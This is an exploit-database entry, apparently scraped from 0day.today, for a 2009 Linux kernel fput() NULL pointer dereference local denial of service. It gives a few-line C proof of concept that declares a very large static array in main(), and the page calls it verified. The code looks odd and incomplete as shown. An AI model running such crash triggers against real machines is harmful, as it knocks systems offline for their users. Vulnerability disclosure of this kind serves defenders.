id: 9764
date: 11/09/2009
title: Linux Kernel 'fput()' NULL Pointer Dereference Local DOS Vulnerabilty
author: n/a
cves: 

===================================================================================
Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty
===================================================================================

# Title: Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty
# CVE-ID: ()
# OSVDB-ID: ()
# Author: David Howells
# Published: 2009-11-09
# Verified: yes

view source
print?
int main()
{
static long long a[1024 * 1024 * 20] = { 0 };
 
return a;
 
}



#  0day.today [2023-03-23]  #